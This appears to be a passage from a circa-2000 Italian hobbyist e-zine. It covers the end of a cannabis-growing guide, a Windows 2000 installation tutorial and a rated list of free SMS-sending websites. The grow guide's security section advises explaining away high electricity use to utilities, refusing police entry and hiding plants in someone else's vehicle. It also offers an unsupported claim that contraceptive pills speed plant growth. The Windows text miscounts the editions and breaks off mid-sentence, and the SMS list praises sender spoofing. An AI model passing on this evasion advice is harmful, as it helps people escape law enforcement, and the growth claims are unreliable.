Usando una soluzione per piante che permette una abbondante ossigenazione è lo stesso
veramente importante. Assicurati di avere un buon drenaggio usando Perlite, sabbia, o
ghiaia nella tua miscela e nel fondo dei vasi. Non usare un mezzo che trattiene troppa acqua,
o puoi significativamente ridurre l'ossigeno a disposizione della pianta. Più su questo
argomento nella sezione 'Colture idroponiche'.
Ossigenare l'acqua prima dell'innaffiamento è altrettanto una buona idea. Nel caso di piante
in vasi di terra, usa una pompa d'aria per gassare l'acqua durante la notte prima di
innaffiare le tue piante, o metti l'acqua in un contenitore con un coperchio e scuotilo molto
bene prima di somministrarla alle piante.



SICUREZZA E RISERBO

Le società elettriche possono rivelare che la tua bolletta è molto cambiata rispetto allo
stesso periodo dell'anno precedente, e in questo modo la polizia riesce a beccare i
coltivatori. Più di 500 watt utilizzati in continuazione all'interno di una famiglia
potranno far sì che si venga segnalati per incremento mensile costante nel consumo di
energia elettrica. Puoi dire di avere un riscaldamento autonomo, molte persone che vivono
in fabbricati lo possiedono, e anche molti televisori, accesi anche a tarde ore, se ti
fanno un accenno (senza malizia). Se bussano gli sbirri e te lo chiedono, non lasciarli
entrare, e sposta le tue piante in un altro posto durante le ore piccole, magari in un
veicolo non di tua proprietà.
Una volta spostate in un nuovo posto, può essere preferibile ripristinare immediatamente un
alto consumo di energia, in modo che la cronologia del tuo consumo energetico non smascheri
le tue attività in futuro.
Fuoriuscite di luce, finestre aperte, calore emanato da stanze che normalmente dovrebbero
essere fredde, e bollette salate sono tutti problemi seri di cui dovresti preoccuparti. Non
lasciare acceso l'allarme antifurto quando vai via da casa. Molte persone sono state arrestate
quando dei marmocchi cercavano di rubare il prezioso giardino e sopraggiungeva la polizia.
Chiudi bene la casa, e lascia che le prendano se ne hanno proprio bisogno. In fondo non vale
la pena essere arrestati per furto...
Pensa in anticipo ad ogni situazione che richiederà una visita alle aree sensibili della casa
da parte di estranei. Riparatori, venditori a domicilio, letturisti del gas-luce-acqua,
vicini, periti stimatori, ed animali domestici devono tutti essere considerati e di
conseguenza bisogna pianificare in anticipo.



ACQUA DISTILLATA

Alcuni coltivatori riportano che acqua purificata o distillata aiuta le loro piante a crescere
più velocemente. Forse ciò è dovuto al sodio e ai metalli pesanti che si trovano nell'acqua
pesante che non sono presenti nell'acqua purificata. L'acqua pesante tende a formare depositi
di sale alcalino nel terreno che bloccano i minerali in tracce, e provocano carenze di ferro,
rame e zinco. Ci sono diversi tipi di acqua purificata, ma molti non sono privi di minerali
che possono causare la formazione di sale per un esteso periodo di tempo.
L'acqua di rubinetto arriva in due modi. Calda e fredda. Il tubo che porta l'acqua fredda ha
una minor formazione di calcio e sodio al suo interno, e dovrebbe essere privo di sedimenti
una volta che il rubinetto è stato aperto e l'acqua è lasciata scorrere per 30 secondi.
L'acqua calda avrà ruggine, depositi di piombo, e molto sodio e calcio, tanto che te ne
accorgerai facilmente. Usa solo la quantità di acqua calda richiesta per raggiungere la
corretta temperatura dell'acqua (20-25°C). L'acqua di rubinetto filtrata attraverso un filtro
di carbone sarà priva di cloro e di particelle molto grandi, ma conterrà ancora solidi
disciolti come sodio e metalli pesanti (piombo, arsenico, nichel, ecc...).
L'acqua purificata in bottiglia dovrà essere o Reverse Osmosis o alcuni tipi di acqua filtrata
carbone/sedimento. Quando acquisti l'acqua in un negozio, a meno che sia RO o Distillata, fai
a meno di comprarla. Può avere ancora gli stessi solidi disciolti e metalli pesanti che ha la
tua acqua di rubinetto.


PILLOLE ANTICONCEZIONALI

Una soluzione con una pillola in 4 litri di acqua è stato riportato che provoca un aumento
della velocità di accrescimento nelle piante di pomodoro. E' possibile che questo aiuti
anche le piante di maria. Un trattamento somministrato prima della fioritura ed uno alcune
settimane prima del raccolto potrebbe aiutare la pianta a maturare più velocemente.
Un coltivatore ci ha riportato una storia su di uno stesso tipo di piante, una trattata con
estrogeni è cresciuta fino a 6 metri, mentre l'altra è rimasta a 2 metri. Questo può essere
puramente aneddotico, ma potrebbe funzionare. Provalo e riferiscici i risultati.



CONSERVAZIONE DI SEMI E GEMME

Usa un barattolo sigillato di quelli per conservare alimenti per sigillare ermeticamente il
sacchetto sotto vuoto.
Congelalo o mettilo in frigo, e le gemme e i semi possono essere conservati per anni in
questo modo.
Sbatti i semi in una carta assorbente per assorbire l'umido. Conservali nel congelatore,
e togli solo tanti semi quanti te ne servono, quindi rimettili subito nel congelatore.




COMMENTO FINALE

Ottimi risultati possono essere conseguiti anche in situazioni

  
che possono apparire alquanto
marginali. (ad esempio: un vaso da 10 cm in una stanza con un lucernario). Con un minimo di:
ambiente di coltura ben drenato, buona luce con ventilazione, applicazione regolare di un
fertilizzante completo, controllo dei parassiti, e precauzioni antisgammo, chiunque può
portare un seme vitale alla maturazione.
Uno non ha necessariamente bisogno di possedere molti soldi, o anche conoscenze specifiche,
per coltivare buone piante.




Un ringraziamento speciale a Romanoff ke mi ha affascinato e mi ha fatto entrare nel
fantastico mondo della Maria e dell' Ash!!! un 10x anke a Niki a Cico e a Giulia ke pur nn
appoggiandomi completamente mi ha aiutato!!! e come nn ringraziare Syn??!! ........ mmmmmm
ecco.....io......vabbe' V.P.N. strunz'! BUON RACCOLTO A TUTTI!!
Phaet (se volete qualke consiglio vesa8_34@yahoo.it)



-----------------------------------------=Miscellanea=-----------------------------------------


ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø GUIDA ALLA FACILE INSTALLAZIONE DI WINDOWS 2000 ø
ø sYn&Norman^B^ ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø


Disclaimer: Questa guida e' basata solo sulla mia conoscenza personale, e non
dovrebbe essere considerata come un'alternativa alla procedura d'installazione
certificata da Microsoft.
L'autore non si prende responsabilita' per altrui azioni.
__________________________________________________________________

Questo è il primo articolo di una serie che sara' riguardante Windows2000 (ebbene sì).



=====> Una piccola premessa sulla famiglia Microsoft Windows 2000 <=====

Questo tutorial insegnera' come fare un'istallazione di Windows 2000 in modo facile,
scorrevole e senza difficolta'.
Per prima cosa bisogna decidere che tipo di ditribuzione andremo ad installare, Microsoft ha
rilasciato (per ora) tre Windows2000:

* Windows 2000 Professional
* Windows 2000 Server
* Windows 2000 Advanced Server
* Windows 2000 Datacenter Server

Microsoft Windows 2000 possiamo definirlo NT questo perchè "E' stato realizzato con la
tecnologia NT" .Questo rappresenta anche un vero appoggio multi-lingue, infatti offre vari
packs di varie lingue.
Cio' significa:

== Avere la stabilita' e le performance della tecnologia NT ==
Windows 2000 prende dei tradizionali valore dei sistemi NT: stabilita', performance e
sicurezza delle informazioni. Che permette un'alta sicurezza delle informazioni dando
all'utente la possibilita' di criptare il file system (EFS), assegnare uno spazio nascosto
e sicuro per usare VPN, liberare il sistema di sicurezza Kerberos, funzioni multiutente, e
molto altro.

== Abbassare il costo totale del possesso ==
Windows 2000 ha molte caratteristiche incorporate, come l'IntelliMirror e le Active
Directories. Queste caratteristiche permettono soluzioni piu' efficienti per la gestione del
sistema.


[== Differenti Edizioni ==]

-> L'edizione Professional e' progettata per gli utenti privati o le piccole aziende, o come
dice Microsoft, "E' Un sistema operativo desktop per gli affari in Internet".

-> L'edizione Server e' studiata per l'organizzazione di reti avanzate. Include molta gestione
dei server della rete, nonche' utility per l'amministrazione. Contiene Active Directories,
Kerberos, i sistemi PKI, Windows Terminal Services, e molte altre utility.
Windows 2000 Server supporta fino a 4GB di RAM e 4 processori.

-> L'edizione Advanced Server e' stata rilasciata per per le aziende e le corporazioni piu'
grandi. Contiene il supporto per 8 processori, una eccellente gestione delle applicazioni, e
una stabilita' sorprendente. L'edizione Advanced Server contiene l'Enterprise Memory
Architecture - EMA, il sistema multiprocessione simmetrico - SMP, e la gestione avanzata dei
database.

Focalizzero' l'articolo sulla versione Professional, perche' e' progetata per le case e per
le piccole industrie, mentre le altre due sono dedicate alle aziende piu' grandi.
Presuppongo che tu sia gia' in possesso del disco di installazione quindi non ti spiegero'
dove trovarlo e quanto costa. Per comprarlo rivolgiti ad un rivenditore di software.

=====> "Comincino le danze" oppure Installare Windows 2000 <=====

[=== Installazione completa o Aggiornamento ===]
Questa domanda mi e' stata rivolta molte volte ma la risposta e' molto semplice: dipende
dalle tue necessita'. Vediamo i pro e i contro di una installazione completa e
dell'aggiornamento.

- Il miglior vantaggio di un'installazione completa e' che si e' salvi dalle varie
incompatibilita' dei drivers. Se installi Win2000 su una precedente installazione di
Windows, Win2k potrebbe usare vecchi driver presenti sul sistema, causando instabilita'.

- D'altro canto, e' ovvio che aggiornando il sistema non si perdono i vecchi programmi.

Quindi la scelta e' solo tua.
Per essere piu' sicuri della stabilita' fai un'installazione completa, ma se non puoi
reinstallare tutto il tuo software che avevi fai un'aggiornamento.

-> Il Setup <-
(Nota: scegli il modo piu' conveniente per avviare l'installazione. La prima e' valida sia
per l'aggiornamento che per l'installazione completa)

Avvio del Setup 1: Ora, dopo aver fatto questa importante decisione, inserisci il cd di
Win2000 nel lettore sotto windows, e aspetta l'avvio automatico (se il setup non parte
automaticamente avviarlo eseguendo il file "Setup.exe" nella directory principale del cd).
Nella prima schermata, scegli tra Aggiornamento o installazione completa.

Avvio del Setup 2: (Solo per installazione partendo da zero)
Nel caso che tu non abbia Windows gia' installato, puoi avviare il sistema direttamante
dal cd. Prima cosa, abilita il boot dal cd nel BIOS del sistema (fai attenzione, non cambiare
nulla di cui non sei sicuro, consulta ben il manuale della scheda madre), Quindi inserisci il
cd e avvia il computer. Se il tuo BIOS non puo' avviare il pc dal cd-rom, puoi creare il
dischetto di avvio col programma apposito incluso sul cd di installazione
(\bootdisk\makeboot.exe).

Installazione (configurazione di base e copia dei file)
Segui le istruzioni del setup che ti compariranno sullo schermo per le prime configurazioni
di base.

Dopo qualche diagnosi del sistema, il setup incomincera' a copiare i file.
Dopo che questa operazione e' terminata il setup resettera' il sistema e lo fara' partire in
Windows 2000 per il prossimo passo dell'installazione. Questa fase dell'instalalzione sembra
svolgersi in dos, ma in realta' si svolge gia' in Windows 2000


[== NTFS o FAT? ==]
Il file system NTFS e' piu' veloce, affidabile, ed ha piu' qualita' che il sistema FAT32 o FAT.
Io raccomando di scegliere di convertire il drive in NTFS. Ma, nota bene che nel caso tu
abbia un sistema con due boot, L'altro sistema operativo non riconoscera' la partizione NTFS,
per esempio se hai installato anche win95 e il dos, questi non saranno in grado di leggere
quella partizione.


[== Componenti da installare ==]
Questa e' una tua decisione personale, dipende dalle tue necessita'. Io posso solo descrivere
i componenti piu' importanti e le loro funzionalita'.

* IIS - Internet Information Services:
Nel caso tu debba avere il tuo web, ftp, e/o il server mail, installa il pacchetto.
Un altro uso per l'IIS e' la prova locale dei file ASP, che ricjiedono appunto
l'installazione dell'IIS web server. Comunque, puoi sempre installarlo o rimuoverlo
in seguito dal pannello di controllo.
IIS permette di creare piu' siti su un solo indirizzo IP, e rende facile creare siti
intranet.IIS contiene il supporto per il contenuto dinamico, come ASP, CGI e ISAPI, e
permette agli sviluppatori di web di includere componenti Activex nei propri siti. IIS
ha il Secure Socket Layer (SSL) che protegge il trasferimento di dati tra il client e il
server.
Un'altra importante funzione di IIS 5.0 e' la possibilita' di essere gestito anche dalla rete.

* Indexing Service
L'indexing service e' utile sui grandi hard disk con una buona performance. Indicizza i
file del sistema per permettere una ricerca piu' veloce. Permette di cercare rapidamente
perole contenute nei file.
Puoi facilmente personalizzare ed impostare l'Indexing Service. Puoi controllare il processo
di indicizzazione, scegliere di indicizzare solo particolari directory, e configurare il
servizio per ottimizzarne le prestazioni.


* La maggior parte degli altri componenti sono relativi alla rete, e non sono necessari se il
pc non fa parte di una rete locale LAN (Local Area Network).


[== Troubleshooting ==]
Come la maggior parte dei prodotti Microsoft, Windows 2000 ha un'interfaccia di setup molto
semplice ed user-friendly. Ma, naturalmente, si possono verificare vari errori.

-> Blocchi di sistema
Se per caso (succedera' sicuramente) il sistema dovesse bloccarsi (col classico schermo blu)
resetta, e il setup automaticamente continuera' l'installazione. Ma se i blocchi si
verificano spesso, e' probabile che tu abbia un hardware incompatibile con Windows 2000. In
questo caso dovresti consultare l'HCL - Windows 2000 Hardware Compatibility List (incluso
sul cd di installzione, \support\hcl.txt), e/o scaricare il "Microsoft Windows 2000
compatibility check program" (sul sito web www.microsoft.com).

Ecco una lista dei piu' comuni crash di Windows 2000 e la loro spiegazione:

^
- IRQL_NOT_LESS_OR_EQUAL -
Meaning that the core tried to gain access to a certain memory segment which is at a higher
level of an Interupt Request Level (IRL) then allowed. While the proccess only allowed
to have access to and IRL level no higher then their own.


Recommendation: This error is probably caused by a faulty driver or a system service. Try
using the "Last Good Known Configuration" option in the safe boot menu (F8 on boot).

Note: If the error surfaces while installing Windows, check that all of your drivers are
compatible with Windows 2000 (consult the HCL).


- KMODE_EXCEPTION_NOT_HANDLED -
This error is generated when the core can't handle a certain directive.

Recommendation: The error might show you the name of the faulty driver. Try disabling it
while booting into Safe Mode.

Note: The situation can sometimes resolved using the Recovery Console.


- NTFS_FILE_SYSTEM -
This error is generated when there is a problem with the Ntfs.sys driver, which is meant to
access inform







sYn & Norman^B^ w w w . h a c k e r s a t . c o m


ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø MONDO SMS ø
ø ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø



Inviare gratis SMS a cellulari italiani

Elenco dei principali siti per l'invio di SMS da Web e da e-mail. L'elenco è aggiornato
ad Ottobre 2000 e potrebbe subire variazioni in considerazione della nuova politica che
i nostri gestori potrebbero mettere in atto sulla consegna degli SMS (adesso per un
gestore è gratis, in futuro, forse, diverrà a pagamento). Nell'elenco sono stati
volutamente eliminati quei siti non dotati di un gateway proprio e che offrono il
servizio in collaborazione con altri (come SMShome.net che attualmente collabora
con Clarence). I siti sono stati suddivisi in categorie, per una più facile consultazione.

Ove non specificato altrimenti, sono sottintesi i seguenti parametri:

invio: gratuito

registrazione al sito per l'accesso: non richiesta

lunghezza massima per SMS: dato non pervenuto

possibili destinatari SMS: tutti i cellulari italiani (non è garantito l'ETACS)

totale SMS inviabili al giorno: dato non pervenuto


--------------------------------------------------------------------------------

Categoria -> siti specializzati
<<< Nati intorno alla telefonia mobile, i siti "specializzati" offrono oggi il
massimo dell'integrazione tra SMS e e-mail, calendari, fax, informazione e servizi,
come loghi e suonerie. Qui l' SMS è alla base del business ! >>>

» Quios * * * * *
Dopo l'enorme successo in tutto il mondo, Quios (si leggi "chi-os" arriva in Italia, con
servizi innovativi. L'invio di SMS (max 128 caratteri) a qualunque utente nel mondo si
rivela molto rapido. Si fa apprezzare la gestione della rubrica, che prevede la creazione
di gruppi. È inoltre possibile ricevere gratuitamente la notifica di ricezione e-mail via
SMS, riportante il mittente e il titolo. Oltre a gestire un'agenda personale che notifica
gli eventi via SMS (come l'italiano ProntoAgenda), è possibile anche richiedere l'invio
differito di SMS, ovvero ad una data prestabilita (ad esempio fare gli auguri ad un amico
il giorno del suo compleanno). In diverse lingue sono sempre disponibili servizi
d'informazione curati direttamente da Quios (oroscopo, previsioni del tempo, news
in collaborazione con Slashdot.org e altro) o, con Planet Quios, dai reporter,
ovvero esperti che hanno deciso di collaborare gratuitamente con Quios per fornire
ogni genere d'informazione (la lista è lunghissima e ci siamo anche noi - reporter
aquilareale).
Possibilità per chi ha un sito di essere sempre raggiunto via SMS, senza dover dare
il proprio numero di cellulare.
http://www.quios.com/

» WikeyFun * * * * *
Un sito per appassionati. È l'unico sito che consente di indicare un mittente qualsiasi (ad
esempio è possibile inviare un SMS col nome DIO ...). SMS da 160 caratteri e disponibili in
modalità Flash. Loghi e picture SMS per cellulari Siemens - altra rarità - completano il
quadro. Presto anche giochi e suonerie.
http://www.wikeyfun.com/

» WAPPI * * * * *
Offre servizi WAP e web-mail di alta qualità. Per inviare SMS (di 142 caratteri) da web a
qualunque cellulare GSM nel mondo occorre registrarsi presso WAPPI e anche presso
CLUBNET (una vera trafila !). Di WAPPI però teniamo a precisare che è l'unico sito
in Italia che invia il contenuto (e non un'anonima notifica) delle e-mail ricevute
direttamente sul proprio cellulare tramite SMS. Peccato per l'obbligo al consenso del
trattamento dati: di tanto in tanto (in verità raramente) WAPPI invia SMS sui cellulari
degli iscritti per informarli di iniziative ed altro.
http://www.wappi.com/

» Clarence * * * * *
SMS da 160 caratteri, tanti loghi e suonerie. Insuperabile.
http://sms.clarence.com/index.php3

» UMAIL* * * * *
Servizio unificato tra e-mail e SMS (per tutti e soli i cellulari GSM). Occorre registrarsi e
possono registrarsi solo gli utenti TIN, compresi gli utenti CLUBNET. Consente di ricevere
e-mail via SMS e inviare e-mail tramite SMS. Le e-mail sono consultabili anche da web e
da wap. È possibile inviare gratis SMS (137 caratteri) da web a tutto il mondo e, unico
in Italia, consente di ascoltare le e-mail ricevute col telefono e rispondere (tramite
allegato vocale) o trasferire su fax. A breve sarà attivato anche l'invio gratuito di fax
da web.
http://www.umail.it/

» Mailsurf * * * * *
Europeo (anche versione italiana), occorre registrarsi. Permette di inviare SMS di 130
caratteri (solo 20 al mese gratis, gli altri a pagamento). Da apprezzare la possibilità
di inviare gratis - unico nel suo genere - fino a 30 lettere tradizionali al mese in tutto
il mondo. Tra i servizi disponibili un calendario, spazio web, indirizzo di e-mail,
cartoline elettroniche, fax (a pagamento), aste e scambio file.
http://www.mailsurf.com/

» ProntoSMS * * * * *
ProntoSMS consente, solo agli utenti registrati, di inviare SMS di 147 caratteri a tutti i
cellulari italiani (escluso BLU !!!). ProntoAgenda è invece un'agenda personale consultabile
da web che avvisa con e-mail o SMS l'evento da ricordare al giorno e all'ora stabilita.
http://pronto.agenda.it/User/SMS/

» GSMBOX * * * *
Il primo portale europeo multilingue sulla telefonia mobile, anche in versione WAP. Oltre
all'invio SMS (di 120 caratteri massimo), ci sono ulteriori servizi a patto di registrarsi. Si
tratta essenzialmente dell'integrazione tra e-mail e cellulare e dell'offerta di servizi
automatici di ricezione SMS a carattere tematico (sport, gossip, f1, borsa, meteo, viaggi,
zodiaco). È l'unico sito che permette (agli utenti registrati) l'invio di SMS riportanti
come mittente il loro numero di cellulare, consentendo così la possibilità di una risposta
immediata da chi riceve il messaggio.
http://www.gsmbox.com/

» CellForum * *
Forum di discussione sulla telefonia cellulare. Possibilità per gli utenti registrati di
inviare 10 SMS al giorno (max 120 caratteri). I destinatari non possono essere utenti BLU
né TIM TACS. L'invio è possibile solo da rubrica. Tra tanti limiti, l'unica nota positiva
è rappresentata dall'archivio che riporta anche lo stato attuale del messaggio.
http://cellforum.made.net/

» Send it * *
Il noto Buongiorno by mail invade i cellulari con questo nuovo sito, Send it. Invio di SMS
da 150 caratteri, solo per gli utenti registrati. Ci si può sottoscrivere a molti servizi
ricevibili via SMS, lo scotto da pagare è la ricezione ogni 4/5 SMS di 1 SMS a carattere
pubblicitario.
http://www.send.it



Categoria -> siti stranieri abilitati all'invio di SMS verso l'Italia
<<< All'estero certo non stanno a guardare. Lo svantaggio di questi siti è dato dalla
lingua, il vantaggio dalla qualità e l'universalità. In generale i siti italiani sono
meglio attrezzati: la possibilità di inviare SMS da web gratuitamente è ancora un miraggio
in alcuni paesi, questi siti sopperiscono alla mancanza. >>>

» VIT * * *
In islandese, di difficile consultazione. Consente l'invio gratuito da web e da e-mail (senza
pubblicità).
http://www.vit.is/

» MTN * * *
In inglese. Occorre registrarsi. Consente di inviare rapidamente SMS (max 147 caratteri) a
quasi tutto il mondo (ma non ad utenti Omnitel !!!). Gradevole e originale l'interfaccia, che
gestisce una rubrica e - uno dei pochi a concederlo gratis - lo storico dei messaggi (compreso
lo stato del messaggio, ovvero se è stato realmente consegnato o meno sul cellulare del
destinatario).
http://www.mtnsms.com/

» SMS.GATE.RU * * *
In russo. Consente di inviare SMS di 160 caratteri da web, oltre ad abilitare chiunque (non
occorre iscrizione) all'invio di SMS via e-mail e viceversa. Nonostante l'assenza di una
pagina in inglese, il sito è abbastanza fruibile e, grazie ai brevi esempi, il funzionamento
è facilmente intuibile.
http://sms.gate.ru/



Categoria -> gestori di telefonia mobile
<<< I nostri gestori permettono di inviare SMS da web. Il primo a dotarsi di questo
strumento è stato Omnitel. In notevole ritardo TIM, che consente l'invio solo ai suoi
utenti. >>>

» InWind * * * * *
InWind si propone quale portale multimediale e multiaccesso. Tutti i servizi sono rivolti
agli utenti registrati. E-mail consultabili da WAP, Web e programmi di posta. Molti i
servizi forniti tramite SMS: rubrica, servizi tematici ma anche di utilità, quali
rubrica e notifica arrivo e-mail. Notevole la possibilità di chattare tramite SMS
usando, da web, il nickname del destinatario piuttosto che il numero del cellulare -
solo InWind offre questa possibilità -
http://www.inwind.it/

» Il portale di BLU * * * *
SMS fino a 160 caratteri, e per gli utenti registrati (non occorre avere un cellulare BLU)
anche la possibilità di inviare SMS da rubrica (prevista la gestione gruppi). Gli utenti
BLU possono richiedere la notifica sul proprio cellulare all'arrivo di una e-mail (servizio
già attivo ma non ancora funzionante).
http://www.blu.it/

» Omnitel 2000 * * *
SMS da 140 caratteri sul portale di Omnitel 2000, inviabili a tutti. Per tutti gli altri
servizi occorre registrarsi. Servizi di news e attualità via sms e wap, con lo stile e le
risorse di un gestore di telefonia mobile.
E-mail consultabili dal sito WAP di Omnitel 2000, Web, programmi di posta e, unico nel suo
genere, anche da telefono di rete fissa. Possibilità (per tutti) di inviare loghi, suonerie
e - unico in Italia - picture SMS. Notifica arrivo e-mail via SMS. Servizi gratuiti e per
tutti gli utenti.
http://sms.2000.omnitel.it/

» Tim Universal Number * *
Dal sito è possibile inviare gratuitamente messaggi di 640 caratteri che verranno
automaticamente divisi in più SMS. Convergenza di diversi servizi tra e-mail, fax,
SMS solo per clienti TIM. Notifica ricezione e-mail gratuita. Non tutti i servizi sono
gratuiti, come la lettura di una e-mail via SMS (£ 300 iva inclusa - il sito Wappi offre
tale servizio gratuitamente). La notifica invece è gratuita.
http://www.uni.tim.it/

» Omnitel *
I servizi sono integrati con Omnitel 2000. Per gli utenti registrati ad Internet
Mailbox (possibile a tutti, indipendentemente dal gestore) c'è la possibilità di
inviare SMS di 120 caratteri (solo ad utenti Omnitel) dalla pagina della posta.
Francamente non si capisce perché dal sito di Omnitel si possono inviare SMS solo a
cellulari Omnitel, da Omnitel 2000 invece a tutti.
http://imb.omnitel.it/



Categoria -> gestori di telefonia fissa
<<< Anche i gestori di telefonia fissa consentono l'invio di SMS. Il servizio è
purtroppo ridotto all'essenziale. >>>

» Tibercom* *
Gestore di telefonia fissa del centro Italia, consente l'invio di SMS di 160 caratteri
http://www.tibercom.it/

» Lombardiacom *
Gestore di telefonia fissa del nord Italia, consente l'invio di SMS di 143 caratteri
http://www.lombardiacom.it/sms/



Categoria -> portali
<<< I portali italiani, primi fra tutti Kataweb e Jumpy, sono dotati quasi tutti di
un gateway SMS. In pochi hanno però sviluppato servizi a valore aggiunto. >>>

» Italia On Line * *
Veramente completo il servizio di invio SMS (massimo 140 caratteri) da web di Italia
On Line (occorre registarsi). Rubrica e flash SMS, invio differito e - unico sul web -
possibilità di salvare l'SMS nella propria casella di posta.
http://sms.iol.it/

» CiaoWeb * *
Portale tuttofare italiano, tra i più dinamici. Oltre all'invio di SMS da
web (120 caratteri), offre la notifica gratuita dell'arrivo di una e-mail via SMS.
http://www.ciaoweb.it

» Everyday.com * *
Occorre registrarsi per inviare gratuitamente ogni giorno un massimo di 10 SMS (lunghezza
massima di 142 caratteri). Gli SMS sono inviabili a qualunque cellulare GSM nel mondo.
Utile la rubrica personale che avverte con e-mail o SMS un evento da ricordare.
http://www.everyday.com/

» Infinito * *
Occorre registrarsi per inviare SMS da web e per accedere ai servizi di Infinito.
Al momento della registrazione, purtroppo, occorre fornire il proprio numero di
cellulare (indispensabile per l'accesso a tutti i servizi wireless).
La novità che propone Infinito è un accesso completo al proprio sito, con qualunque
dispositivo. Non solo tramite internet, ma anche tramite cellulari WAP e computer
palmari (attualmente sono abilitati: PalmPilot, Palm III, Palm V, Palm VII, Handspring
Visor, Philips Nino, Casio Cassiopeia). E per i primi cellulari (quelli senza WAP)
c'è l'opportunità di iscriversi a canali tematici con ricezione del materiale tramite
SMS. La ricezione degli SMS, così come avviene per i siti concorrenti, è gratuita.
http://www.infinito.it/

» Jumpy * *
Solo 125 caratteri a disposizione per 1 SMS e una raccolta di frasi famose da inviare
ad amici e conoscenti. Jumpy, portale generalista italiano, offre gli stessi servizi
automatici di ricezione SMS a carattere tematico (sport, gossip, f1, borsa, meteo,
viaggi, zodiaco) di GSMBOX, che infatti fa parte del Network di Jumpy.
http://www.jumpy.it/830sms.htm

» Cellularmania Kataweb Repubblica.it KwMusica CNNitalia.it Radio Capital Radio Deejay * *
CellularMania è un sito dedicato ai cellulari di buona qualità. Possibilità di acquistare i
cellulari da web. Kataweb è un potente portale generalista italiano e nuovo gestore di
telefonia fissa. Il gateway SMS (lunghezza massima 120 caratteri) è condiviso dai siti
partner e la scritta "Sono espressamente vietate le forme di utilizzo professionale del
servizio e quelle che prevedano una generazione automatica dei messaggi" è un avvertimento
per webmaster e programmatori di software SMS circa l'utilizzo del gateway stesso. A questo
proposito ricordiamo le lodevoli scelte diverse fatte da portali come Clarence.
http://www.cellularmania.com
http://www.kataweb.it
http://www.repubblica.it
http://www.kwmusica.kataweb.it
http://www.cnnitalia.it
http://www.capital.it
http://www.deejay.it

» SuperEva * *
Portale italiano. Invio di SMS da web (120 caratteri), possibilità di scegliere
la modalità flash. Occorre registrarsi.
http://freesms.supereva.it/cgi-bin/index.chm

» Caltanet *
Giovane portale italiano. SMS di 140 caratteri, non occorre iscriversi.
http://www.caltanet.it/

» Monrif *
Portale recente. SMS di 140 caratteri gratis per gli iscritti verso tutti i
cellulari italiani (escluso BLU !!!). C'è di meglio sulla rete.
http://mysms.monrif.net

» E-loft *
Sito europeo degli studenti. SMS di 145 caratteri inviabili in tutta Europa.
http://www.it.e-loft.com/

» HOT *
Portale italiano. Invio di SMS da web (140 caratteri) riservato agli iscritti.
Possibilità di ricevere SMS sulla F1.
http://www.hot.it/sms/

» Kiberlandia *
Portale italiano. Invio di SMS da web (110 caratteri, 120 caratteri agli iscritti).
Ovvero il minimo indispensabile, anche meno.
http://www.kyberlandia.it/Servizi/SMS/default.asp



Categoria -> siti commerciali
<<< Gli SMS sono usati anche da siti nati intorno all'e-commerce.
Vediamo come. >>>

» CHL * * * *
Occorre registrarsi presso CHL per godere dell'avanzato servizio di invio SMS da web.
La lunghezza degli SMS è di soli 125 caratteri (il resto è pubblicità), ma è da
sottolineare la possibilità di invio in modalità flash e la gestione della rubrica,
con divisione in gruppi. È possibile usare gli SMS per fare acquisti (servizio Pocket).
Possibilità di inviare anche fax gratuitamente.
http://www.chl.it/

» Flashmall * *
Ottimo sito di acquisti on-line, con una sezione dedicata all'invio gratuito di 5 SMS
giornalieri di 125 caratteri ognuno. E' possibile chiedere di essere avvisati da un SMS
all'arrivo di un prodotto qualora questo fosse indisponibile.
http://www.flashmall.it/sms.asp?action=sms



Categoria -> altri
<<< Altri siti hanno pensato di usare gli SMS solo per attrarre utenti oppure per
sviluppare progetti inediti, basati proprio sugli SMS. >>>

» Enel * *
Il principale fornitore di energia elettrica in Italia ha un portale tutto suo, con tanto
di gateway per l'invio di SMS. La lunghezza massima è di 320 caratteri, quindi messaggi
molto lunghi verranno divisi in 2 o 3 SMS (Enel aggiunge una firma alla fine dei messaggi)
http://www.enel.it

» GoingTonight *
GoingTonight non è il classico sito per l'invio di SMS da web. GoingTonight è una
comunità o "il primo villaggio mobile del mondo", come amano definirsi. Consente agli
iscritti di inviare fino a 100 SMS alla propria lista di destinatari. Così, se un
gruppo di amici vuole mettersi d'accordo sull'uscita serale, inviando un SMS a
GoingTonight, GoingTonight si preoccuperà di smistarlo subito agli amici. I quali,
se sono iscritti, potranno rispondere. Superata quota 100, i messaggi si pagano.
Inoltre si riceve pubblicità mirata via SMS. I messaggi possono essere inviati anche da web.
Possibilità per chi ha un sito di essere sempre raggiunto via SMS, senza dover dare il
proprio numero di cellulare.
http://www.goingtonight.it/



Categoria -> Siti a pagamento
<<< Offrono l'invio di SMS a pagamento. Quando i gateway free erano una rarità,
potevano anche interessare, adesso sono deserti >>>

» SMS.it *
£ 150 a messaggio per un sito ricco nell'offerta (invio a tutto il mondo, rubrica,
corretto numero del mittente, consegna immediata, notifica, archivio, invio multiplo e
differito, stato messaggio. Adesso questa stessa offerta la si può trovare a costo zero.
Se poi preferite lo stesso pagare ...
http://www.sms.it/gratis.htm

» netSms
Inviare SMS da web (max 150 caratteri) e pagarli £ 300 ognuno ? Per masochisti
http://netsms.com/



Categoria -> siti non più abilitati
<<< Cimitero di gateway web2sms. Hanno avuto il loro momento di gloria,
piccolo o grande, poi non hanno retto i forti costi. Visitarli e vederli non
operativi mette una certa angoscia ... >>>

» AdriaCom Cell.it JavaroNet ShinySMS
Questi gateway non sono attualmente attivi.









© Copyright SMS "NOPOPS" Spa 2000-2001



ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø WRITERS BLOCK (LO STILE) ø
ø Jrash ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø






